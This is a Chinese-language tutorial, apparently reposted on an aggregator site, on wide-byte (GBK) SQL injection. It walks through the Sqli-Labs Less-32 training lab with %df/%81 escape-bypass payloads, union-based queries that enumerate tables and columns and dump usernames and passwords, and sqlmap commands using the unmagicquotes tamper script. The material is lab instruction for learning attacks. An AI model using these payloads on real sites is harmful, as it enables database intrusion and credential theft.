栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Python

SQL注入 | 宽字节注入2

Python 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

SQL注入 | 宽字节注入2

SQL注入 | 宽字节注入2 1.宽字节注入基础

最常使用的宽字节注入是利用%df,其实我们只要第一个ASCII码大于128就可以了,比如ASCII码为129的就可以,但是我们怎么将他转换为URL编码呢,其实很简单,我们先将129(十进制)转换为十六进制,为0x81,如图所示,然后在十六进制前面加%即可,即为%81

GBK首字节对应0x81-0xFE,尾字节对应0x40-0xFE(除0x7F)

2.宽字节注入代码分析

mysql_real_escape_string()和addslashes()功能类似

上述函数过滤了反斜杠,单双引号,MySQL使用了GBK编码

3.宽字节SQL注入演示

以Sqli-Labs-Less32为例
1.当我们使用1'时,发现被单引号转义

2.使用前面讲到的知识点,使用下述语句进行探测

?id=1%df%27 --+

3.将%df换成%81进行探测,发现依然可以

?id=1%81%27 --+


4.查看注入点

?id=-1%81%27 union select 1,2,3--+

5.使用union注入,获取数据库信息

-1%81%27 union select 1,database(),3--+


6.得到数据库security,获取数据表信息

?id=-1%81%27 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+

7.字符串转十六进制在线网站
https://www.bejson.com/convert/ox2str/

因为单引号被过滤,因此将数据表名转换为十六进制
我们使用users表,查看其字段名

?id=-1%81%27 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273),3--+


8.获取字段内容

?id=-1%81%27 union select 1,(select group_concat(id,username,password) from users),3--+

4.sqlmap安全检测

1.使用sqlmap探测,可以发现可以使用布尔盲注,报错注入,时间盲注,union注入

python2 sqlmap.py -u "http://url/?id=1" --tamper=unmagicquotes.py


2.获取数据库的信息

python2 sqlmap.py -u "http://localhost/sqli-labs-master/Less-32/?id=1" --tamper=unmagicquotes.py --dbs


3.使用数据库security,获取表名信息

python2 sqlmap.py -u "http://localhost/sqli-labs-master/Less-32/?id=1" --tamper=unmagicquotes.py -D security --tables


4.使用数据库security,数据表users,获取字段及内容

python2 sqlmap.py -u "http://localhost/sqli-labs-master/Less-32/?id=1" --tamper=unmagicquotes.py -D security -T users --dump

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/657416.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号